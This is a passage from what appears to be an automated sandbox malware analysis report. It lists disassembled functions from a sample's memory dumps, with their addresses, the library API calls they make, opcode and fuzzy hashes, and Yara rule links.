                                                                                                                                                                    • Instruction ID: 9a9a30ad456c6b05efd7a5cab2669dbc63bbc038e82c93c21506d9a9821c14e3
                                                                                                                                                                    • Opcode Fuzzy Hash: 227c581fdcd6e26d2fae43994bf120bdb8fc194b86a2872c4e62d65689474a73
                                                                                                                                                                    • Instruction Fuzzy Hash: 083157B1A453008BDB24CF28C8C236777F2BFA5314B18926DD4568F389E738E5048794
                                                                                                                                                                    Function 0040E241 Relevance: .1, Instructions: 124COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                    • Opcode ID: 80304f92bfefea0d64f42d7b01789b1189e94eeaa76237d333d7c330f578015a
                                                                                                                                                                    • Instruction ID: 60339eddc0173d1ec18e5eeb43bd1caa34ec5effa829d42d58abfd61bbba0c8f
                                                                                                                                                                    • Opcode Fuzzy Hash: 80304f92bfefea0d64f42d7b01789b1189e94eeaa76237d333d7c330f578015a
                                                                                                                                                                    • Instruction Fuzzy Hash: 89313379609200AFD7084B14D941A3F7397EBD6728F68993DD84263391C63ADC238B8E
                                                                                                                                                                    Function 00408080 Relevance: .1, Instructions: 110COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: eec75bb5b9784e5abdd51e0ba578dd31662d51ed021dccbf6fb7c89fd332b71d
                                                                                                                                                                    • Instruction ID: acfd48111fbd9615f3bc449ef3c53ff6dca47a65e15afbcd4686033712ee79da
                                                                                                                                                                    • Opcode Fuzzy Hash: eec75bb5b9784e5abdd51e0ba578dd31662d51ed021dccbf6fb7c89fd332b71d
                                                                                                                                                                    • Instruction Fuzzy Hash: 923166395096F04ED3328D2C886007EBFA15DA610439A40FFD8F15F7C3C82ACA4A93A1
                                                                                                                                                                    Function 00415D31 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                    • Opcode ID: c67c5b797179975869dfebc7af832761b7455203c3f4d66d676686890584a005
                                                                                                                                                                    • Instruction ID: 54be0fac22394bf5e03cae6f7d24e31eefa285fb73965d2b5cdea1265568cae1
                                                                                                                                                                    • Opcode Fuzzy Hash: c67c5b797179975869dfebc7af832761b7455203c3f4d66d676686890584a005
                                                                                                                                                                    • Instruction Fuzzy Hash: 6B210235500A00EFCB258F55D884ABBB7B3EBD6300F54942ED58617622C739AC82970D
                                                                                                                                                                    Function 00428F6F Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 568f38df33fd9aa8dd9503ba15e537947588866558ea7354307e5e884fa53f04
                                                                                                                                                                    • Instruction ID: c882f5bce52f99bcf362bc4032049ecb042a8ae086f53545e4d25fa3f5188a4c
                                                                                                                                                                    • Opcode Fuzzy Hash: 568f38df33fd9aa8dd9503ba15e537947588866558ea7354307e5e884fa53f04
                                                                                                                                                                    • Instruction Fuzzy Hash: 8D31CFF1E142649FDB54CF29D842B9A7FB0EB4A360F565298D455AF3A2C3708802CFC9
                                                                                                                                                                    Function 004228D0 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: d30baa3910366b7ac7d10cbcdc68a05bd4903404c944bb894baed93877427ccd
                                                                                                                                                                    • Instruction ID: 450d52cb387bc023e60d4c3b5a952c4616046fd10989ac4fedb9fbaaa68f9623
                                                                                                                                                                    • Opcode Fuzzy Hash: d30baa3910366b7ac7d10cbcdc68a05bd4903404c944bb894baed93877427ccd
                                                                                                                                                                    • Instruction Fuzzy Hash: 99213671A883618FD314CF15D8913AFBBA5EBC1740F15883CE4D56B380CAB998468B96
                                                                                                                                                                    Function 0042C748 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 17ebf823db9cec30f63c443f4186414a6ba33a4c0adf3a9d51f64187fc2bac46
                                                                                                                                                                    • Instruction ID: e9f3e9650164601890ced0544c0f02b7729192584efcee19ecc91f8fead8134b
                                                                                                                                                                    • Opcode Fuzzy Hash: 17ebf823db9cec30f63c443f4186414a6ba33a4c0adf3a9d51f64187fc2bac46
                                                                                                                                                                    • Instruction Fuzzy Hash: B1110337785A528BD326CE29C9C1266FBA3AFD621071D816DC19687752C638A4068A44
                                                                                                                                                                    Function 00433140 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                    • Instruction ID: 4e86f99d925bcada67c6dc231c8028c5e08e54cd8b9d58ecd4c9aeecd7b1336e
                                                                                                                                                                    • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                    • Instruction Fuzzy Hash: 93110C33A091D40EC7168D3C8800565BFA30A97636F1D539AF4B49B2D6D62B8E8B8359
                                                                                                                                                                    Function 004295E0 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 7ed6eb60af09c6b6b2b769e36e2ba9e7501cb0ddbaa3fc61a5cdb4d33fcc8789
                                                                                                                                                                    • Instruction ID: 2f9fd05e15a9df4ea57e59ebbdb4ad1c1921c334f53bb94ff2ebd427e50c56fb
                                                                                                                                                                    • Opcode Fuzzy Hash: 7ed6eb60af09c6b6b2b769e36e2ba9e7501cb0ddbaa3fc61a5cdb4d33fcc8789
                                                                                                                                                                    • Instruction Fuzzy Hash: 5701B5F170071157DB219E65E5C1B27B2E85F90718F08443ED88857342EB7DEC48C29D
                                                                                                                                                                    Function 0040D417 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                    • Opcode ID: dd47511f228f59cd0b419d4a7d61deae028f30c599e15f9e93c347d6a8a5527d
                                                                                                                                                                    • Instruction ID: c8dacb64f24bffcdf688004061929ff8f42ee351ddc99e66c0101c4e96c7fe83
                                                                                                                                                                    • Opcode Fuzzy Hash: dd47511f228f59cd0b419d4a7d61deae028f30c599e15f9e93c347d6a8a5527d
                                                                                                                                                                    • Instruction Fuzzy Hash: 7911E174A142419FE718DF18DC41B7F73A2EBC6314F588A3DE486A3391DB78A8568B09
                                                                                                                                                                    Function 004172AE Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: b1ba1dd86ee031ffc1a041775e869174edd704c5735dbc39e9af328c62ed513e
                                                                                                                                                                    • Instruction ID: bea52cbcd65b622c50162f8ffc8062d65d78ba255181f1fbe369cbfdb75ee12b
                                                                                                                                                                    • Opcode Fuzzy Hash: b1ba1dd86ee031ffc1a041775e869174edd704c5735dbc39e9af328c62ed513e
                                                                                                                                                                    • Instruction Fuzzy Hash: 42D0C974904A4087C214EF11D951A76F3B1AB8A718F10282EE08B67692CE24FD44C75D
                                                                                                                                                                    Function 0042669F Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 027bf55f418d85534eff5d9e91e9602374634e1dbf1ab012fce7b7876ecff7ea
                                                                                                                                                                    • Instruction ID: cd556697b7e3fac87e64a1387bd772149c9b0f4cf68e7cb9e3afc26c36cba7a9
                                                                                                                                                                    • Opcode Fuzzy Hash: 027bf55f418d85534eff5d9e91e9602374634e1dbf1ab012fce7b7876ecff7ea
                                                                                                                                                                    • Instruction Fuzzy Hash: FEA022ECC088808BCA00CF00B802330F238A28B20AF003838E08CF3203EA20F00C820E
                                                                                                                                                                    Function 00430737 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 114COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InitVariant
                                                                                                                                                                    • String ID: n$r$u$w$z$~
                                                                                                                                                                    • API String ID: 1927566239-3573990534
                                                                                                                                                                    • Opcode ID: f93af1845080e0c2662f79180b03bc063467f7becf3e08bc42346d01ba68d0ab
                                                                                                                                                                    • Instruction ID: 1b896553e77637ef5f26b5b42077bac7953384b2d098cbe4fbc9c7dbb3d5c9ff
                                                                                                                                                                    • Opcode Fuzzy Hash: f93af1845080e0c2662f79180b03bc063467f7becf3e08bc42346d01ba68d0ab
                                                                                                                                                                    • Instruction Fuzzy Hash: 65511931208B818BD7158E3CC894646BFE1AB96224F18879CD8AA4F7EAC779D415C761
                                                                                                                                                                    Function 0042FF38 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 104COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InitVariant
                                                                                                                                                                    • String ID: n$r$u$w$z$~
                                                                                                                                                                    • API String ID: 1927566239-3573990534
                                                                                                                                                                    • Opcode ID: 396f0396f3a458675dce1994166e2eab495ad6a3eba382d8fde0f0946fb1810a
                                                                                                                                                                    • Instruction ID: 83156171ca65f2f7873478f56621f2fe8874ca19cad56d3c089c6bd1d4a34c80
                                                                                                                                                                    • Opcode Fuzzy Hash: 396f0396f3a458675dce1994166e2eab495ad6a3eba382d8fde0f0946fb1810a
                                                                                                                                                                    • Instruction Fuzzy Hash: C8412921208BC18ED725CF3CC884706BFA16B56224F08879DD9E98F7EBC279D515C762
                                                                                                                                                                    Function 00DAA222 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCPInfo.KERNEL32(00000000,00000000,00000000,7FFFFFFF,?,00DAA20D,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 00DAA2C8
                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00DAA383
                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00DAA412
                                                                                                                                                                    • __freea.LIBCMT ref: 00DAA45D
                                                                                                                                                                    • __freea.LIBCMT ref: 00DAA463
                                                                                                                                                                    • __freea.LIBCMT ref: 00DAA499
                                                                                                                                                                    • __freea.LIBCMT ref: 00DAA49F
                                                                                                                                                                    • __freea.LIBCMT ref: 00DAA4AF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3381795229.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 0000000A.00000002.3381727415.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381895759.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381970781.0000000000DB5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382204412.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382274530.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382356213.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 127012223-0
                                                                                                                                                                    • Opcode ID: 196215ec6b57d5b02b4251abe7e3bb7b34d434bd4a348727ed84bccd2805d63e
                                                                                                                                                                    • Instruction ID: f318e012d43bb99a512f4df76be8f6619b1326af3b628013e632017dbc91132d
                                                                                                                                                                    • Opcode Fuzzy Hash: 196215ec6b57d5b02b4251abe7e3bb7b34d434bd4a348727ed84bccd2805d63e
                                                                                                                                                                    • Instruction Fuzzy Hash: 1E71D672904205ABDF219F9C8C45BAE7BBAEF4B310F194655F909A7281E7B6CC00C772
                                                                                                                                                                    Function 00D954C5 Relevance: 12.2, APIs: 8, Instructions: 177COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 00D9550C
                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00D95538
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00D95577
                                                                                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D95594
                                                                                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00D955D3
                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00D955F0
                                                                                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00D95632
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00D95655
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3381795229.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 0000000A.00000002.3381727415.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381895759.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381970781.0000000000DB5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382204412.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382274530.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382356213.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2040435927-0
                                                                                                                                                                    • Opcode ID: cff91b19566a84c5b4a072f2dc35b321d73c12a18b57b918995e2bc72fac003c
                                                                                                                                                                    • Instruction ID: e9c991ee5b91f2adadf090b7ee72f34a64335a079fd9831a9afc052238ef6ec3
                                                                                                                                                                    • Opcode Fuzzy Hash: cff91b19566a84c5b4a072f2dc35b321d73c12a18b57b918995e2bc72fac003c
                                                                                                                                                                    • Instruction Fuzzy Hash: 6A51BE72600606EFEF229F64EC45FAA7BA9EF40750F694539F905E6198DB30CD109BB0
                                                                                                                                                                    Function 00D961E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00D96217
                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00D9621F
                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00D962A8
                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00D962D3
                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00D96328
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3381795229.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 0000000A.00000002.3381727415.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381895759.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381970781.0000000000DB5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382204412.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382274530.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382356213.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                    • String ID: csm
                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                    • Opcode ID: 92d8e712b207ed14d847b18cd667db5df8b1a6c3b4ae2ded133375c7df567ebd
                                                                                                                                                                    • Instruction ID: c586d583ab1745bfa2c67831caf1dc632cbfd5b4b9e163b4f55711c97a1f8de4
                                                                                                                                                                    • Opcode Fuzzy Hash: 92d8e712b207ed14d847b18cd667db5df8b1a6c3b4ae2ded133375c7df567ebd
                                                                                                                                                                    • Instruction Fuzzy Hash: 0641B330A00218EFCF11DF68C885A9E7BB5EF45324F188555F818AB392DB31EA05CBB5
                                                                                                                                                                    Function 00D9F469 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00D9F578,00D9186A,?,00000000,00D931E1,00D9186C,?,00D9F1F6,00000022,FlsSetValue,00DADFE0,00DADFE8,00D931E1), ref: 00D9F52A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3381795229.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 0000000A.00000002.3381727415.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381895759.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381970781.0000000000DB5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382204412.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382274530.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382356213.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                                    • API String ID: 3664257935-537541572
                                                                                                                                                                    • Opcode ID: 1dd367d89e3e6350d866c839d3ccc07e7f668757508970b73dcf89ce3d598cf0
                                                                                                                                                                    • Instruction ID: 11c2d0f8adb64f55925134126cdcd4decf98e5d24d17778de694e68c9dee4e7c
                                                                                                                                                                    • Opcode Fuzzy Hash: 1dd367d89e3e6350d866c839d3ccc07e7f668757508970b73dcf89ce3d598cf0
                                                                                                                                                                    • Instruction Fuzzy Hash: 06218176A41311EBCF229B64EC44A5A7768DB41764B294620F956E7390E670EE00D6F0
                                                                                                                                                                    Function 00DA625D Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3381795229.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 0000000A.00000002.3381727415.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381895759.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381970781.0000000000DB5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382204412.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382274530.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382356213.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 3ab9c68467e816f66dc447e32b31d87e75953ca6ec0c94e41db27ec3fd29b2dc
                                                                                                                                                                    • Instruction ID: 2dffe5bfd174066dc8afa8ab0b9a737d6bc84a809761f61d85d2cc424a526569
                                                                                                                                                                    • Opcode Fuzzy Hash: 3ab9c68467e816f66dc447e32b31d87e75953ca6ec0c94e41db27ec3fd29b2dc
                                                                                                                                                                    • Instruction Fuzzy Hash: 01B1BA71E04244EBDF119FA8D890BAEBBB1EF4A310F1C4259E5419B296C7B0D9418BB1
                                                                                                                                                                    Function 00D9D2C0 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00D9D2B7,00D95FB7,00D95179), ref: 00D9D2CE
                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D9D2DC
                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D9D2F5
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,00D9D2B7,00D95FB7,00D95179), ref: 00D9D347
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3381795229.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 0000000A.00000002.3381727415.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381895759.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381970781.0000000000DB5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382204412.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382274530.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382356213.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                    • Opcode ID: bac457c1d0357e43d4fd7ae8762c2000ad9b1ee127a26699745eeb32f5bafc45
                                                                                                                                                                    • Instruction ID: ec115a08063d6267eeeacb580e6643f29f2181582ee05f5d62edd4d344eaa71a
